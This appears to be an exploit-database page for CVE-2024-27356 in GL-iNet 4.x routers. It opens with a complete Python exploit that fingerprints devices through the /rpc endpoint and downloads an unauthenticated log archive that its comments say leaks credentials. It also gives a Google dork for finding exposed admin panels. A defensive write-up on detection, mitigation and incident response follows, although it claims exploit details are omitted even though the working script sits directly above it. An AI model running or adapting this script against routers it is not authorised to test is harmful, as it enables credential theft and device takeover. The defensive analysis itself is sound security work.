GL-iNet MT6000 4.5.5 - Arbitrary File Download

Exploit Author: Bandar Alharbi
Analysis Author: www.bubbleslearn.ir
Category: Remote
Language: Python
Published Date: 2024-04-02
# Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download
# CVE: CVE-2024-27356
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: 2/26/2024
# Exploit Author: Bandar Alharbi (aggressor)
# Vendor Homepage: www.gl-inet.com
# Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin
# Tested Model: GL-X3000 Spitz AX
# Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md

import sys
import requests
import json
requests.packages.urllib3.disable_warnings()
h = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'}

def DoesTarExist():
    r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h)
    if r.status_code == 200:
        f = open("logread.tar", "wb")
        f.write(r.content)
        f.close()
        print("[*] Full logs archive `logread.tar` has been downloaded!")
        print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!")
        return True
    else:
        print("[*] The `logread.tar` archive does not exist however ... try again later!")
        return False

def isVulnerable():
    r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h)
    if r1.status_code == 500 and "nginx" in r1.text:
        r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h)
        if  "Admin-Token" in r2.text:
            j  = {"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]}
            r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h)
            ver = r3.json()['result']['firmware_version']
            model = r3.json()['result']['model']
            if ver.startswith(('4.')):
                print("[*] Firmware version (%s) is vulnerable!" %ver)
                print("[*] Device model is: %s" %model)
                return True
    print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!")
    return False

def isAlive():
    try:
        r = requests.get(url, verify=False, timeout=30, headers=h)
        if r.status_code != 200:
            print("[*] Make sure the target's web interface is accessible!")
            return False
        elif r.status_code == 200:
            print("[*] The target is reachable!")
            return True
    except Exception:
        print("[*] Error occurred when connecting to the target!")
        pass
    return False

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("exploit.py url")
        sys.exit(0)
    url = sys.argv[1]
    url = url.lower()
    if not url.startswith(('http://', 'https://')):
        print("[*] Invalid url format! It should be http[s]://<domain or ip>")
        sys.exit(0)
    if url.endswith("/"):
        url = url.rstrip("/")

    print("[*] GL.iNet Unauthenticated Full Logs Downloader")

    try:
        if (isAlive() and isVulnerable()) == (True and True):
            DoesTarExist()
    except KeyboardInterrupt:
        print("[*] The exploit has been stopped by the user!")
        sys.exit(0)


GL‑iNet MT6000 / GL‑X3000 (firmware 4.x) — Arbitrary File Download (CVE‑2024‑27356): Analysis, Impact, and Mitigation

This article provides a technical but non‑actionable overview of CVE‑2024‑27356 — an unauthenticated arbitrary file download vulnerability affecting certain GL‑iNet routers running the 4.x firmware line (reported in early 2024). It focuses on what the flaw means, who is affected, how defenders can detect abuse, and practical remediation and hardening guidance for organizations and home users. This content is written for security practitioners, administrators, and auditors; exploit details and step‑by‑step attack instructions are intentionally omitted.

Executive summary

  • Vulnerability type: Unauthenticated arbitrary file download / information disclosure.
  • Impact: Confidential files (including system logs, credentials and device identifiers) may be retrievable without authentication, exposing sensitive configuration and secrets.
  • Affected products: Multiple GL‑iNet models running firmware in the 4.x series (vendor advisory should be consulted for exact model/firmware mapping).
  • Mitigation: Apply vendor updates/patches, restrict administrative interfaces, rotate exposed credentials, and follow network segmentation and monitoring best practices.

What this vulnerability means (non‑technical explanation)

The vulnerability allows an unauthenticated user who can reach the device's web management interface to download files that should not be publicly available. Those files may contain logs, configuration snippets, and possibly plaintext credentials or tokens. Because no authentication is required, an attacker who can reach the device over the network (locally or via exposed management ports) can harvest sensitive information and use it as a foothold for further compromise.

Technical overview (high‑level)

  • The flaw is an information disclosure/arbitrary file retrieval issue in the router web stack that exposes server‑side file resources to unauthenticated HTTP(S) requests under certain firmware versions.
  • The exposure often manifests as accessible archives or log files that aggregate system and service output. Those artifacts commonly contain debug information, device identifiers, and other secrets.
  • Because the issue is unauthenticated, simply being able to establish an HTTP(S) connection to the device's management interface is sufficient for exploitation.

Affected products and versions

Vendor advisories and coordinated disclosures list several GL‑iNet devices running 4.x firmware as impacted. Exact model/firmware mappings can change as vendors issue patches or clarifications. Always consult the GL‑iNet security advisory or firmware release notes for the authoritative list and patched firmware versions.

Vendor    | Product family / models                          | Firmware series
----------|--------------------------------------------------|---------------------------
GL-iNet   | GL-X3000 (Spitz AX) and other 4.x series devices | 4.x (see vendor advisory)

Realistic impact and use cases

  • Information disclosure: Attackers can retrieve logs and files containing usernames, device IDs, API tokens, or network topology details.
  • Credential harvesting: Exposed configuration files may reveal SSH keys or admin credentials that enable remote takeover.
  • Pivoting and reconnaissance: Retrieved configuration can reveal upstream VPN credentials, cloud integrations, or lateral‑movement opportunities.
  • Privacy risk: Logs may contain personally identifiable information (PII) or session data tied to users of the device.

Detection and indicators of compromise (defensive guidance)

Focus on detecting anomalous access patterns to management interfaces and signs of file enumeration/download activity. Suggested detection approaches:

  • Network monitoring: Alert on HTTP(S) GET/POST requests to device admin interfaces originating from unexpected networks or external IPs.
  • Access logs: Search web server or gateway logs for requests that return large binary responses or archive‑style responses (unusually large content length for admin endpoints).
  • SIEM rules: Create rules that flag:
    • Connections to router admin pages from external IPs
    • High‑volume GET requests to a single management host
    • Events that show file download content types (application/x‑tar, application/octet‑stream) from admin paths
  • Endpoint checks: On managed devices, verify that log archive files are not stored in publicly accessible web directories and inspect system logs for unexpected file reads.
  • Inventory verification: Maintain an accurate inventory of devices and firmware versions and cross‑reference it against vendor advisories.

Safe example: How to check firmware version (non‑exploit pseudocode)

# Pseudocode (defensive only) - check a device's reported firmware version
# Run this only against devices you own or are authorized to test.

import requests

def get_firmware_version(base_url, timeout=10):
    # Query a benign, documented status endpoint or management page that reports firmware version.
    # "/status" below is a placeholder path; substitute the endpoint documented for your device.
    # DO NOT issue requests to undocumented endpoints or attempt to download files.
    try:
        r = requests.get(f"{base_url}/status", timeout=timeout, verify=True)
        if r.status_code == 200:
            data = r.json()    # or parse HTML if the status is presented on a page
            return data.get("firmware_version")
    except (requests.RequestException, ValueError):
        # connection failures and non-JSON responses are reported as "unknown"
        return None
    return None

# Example usage
version = get_firmware_version("https://router.example.local")
if version:
    print("Firmware version:", version)
else:
    print("Unable to determine firmware version.")

Explanation: The pseudocode above demonstrates a defensive approach for obtaining an innocuous firmware version field from a documented status endpoint. It avoids referencing any undocumented or sensitive endpoints and is intended for inventory and patch verification tasks only. Always use vendor‑documented management APIs or the official web UI when checking firmware information.

Mitigation and remediation

  • Update firmware: Install the vendor's security patch or updated firmware as soon as it is available. This is the primary remediation step.
  • Limit administrative exposure: Disable remote (WAN‑side) access to the device management interface. Permit web admin access only from trusted internal networks or via an administrative VPN.
  • Network segmentation: Place consumer or small‑office routers on segregated management VLANs; avoid placing management interfaces on networks with general user traffic.
  • Rotate credentials and keys: If you suspect the device may have been accessed, rotate administrative passwords, API tokens, and any embedded keys or VPN credentials that may have been exposed.
  • Harden configuration: Disable unnecessary services (e.g., remote logging to public buckets, debug archives) and enable logging/alerting for admin events.
  • Access control & firewalling: Use firewall rules to restrict HTTP(S) access to device management ports to specific IPs and ranges.

Incident response checklist

  • Isolate affected devices from networks exposing management interfaces externally.
  • Collect forensic artifacts: preserved web server logs, syslogs, and file system snapshots for the device (if practicable and safe to do so).
  • Search for signs of credential reuse (logins that used the same credentials elsewhere) and rotate those credentials.
  • If sensitive keys or credentials were exposed, assume compromise and rotate or revoke them.
  • Apply updates and reconfigure device according to vendor guidance; monitor for signs of reinfection or repeated exploitation.

Best practices to reduce exposure to similar vulnerabilities

  • Maintain an up‑to‑date asset inventory (device model, firmware, exposure level).
  • Automate firmware checks and patching where possible, especially for devices on remote sites.
  • Restrict management plane access by default (deny‑by‑default firewall posture).
  • Use multi‑factor authentication for device management where supported.
  • Regularly audit configuration backups and stored logs for sensitive content that should not be publicly accessible.

Responsible disclosure and resources

For definitive guidance, consult the official GL‑iNet security advisory and firmware release notes. If you discover a suspected compromise or vulnerability in your environment, follow your organization’s incident response procedures, and report confirmed security issues to the vendor through their official channels. Avoid attempting to exploit or reproduce vulnerabilities on devices you do not own or without explicit authorization.

References and further reading

  • GL‑iNet official site and firmware release notes — consult vendor for patched firmware and advisories.
  • Security best practice guides for embedded devices and router management.
  • Network segmentation, firewalling, and secure remote management documentation from reputable sources.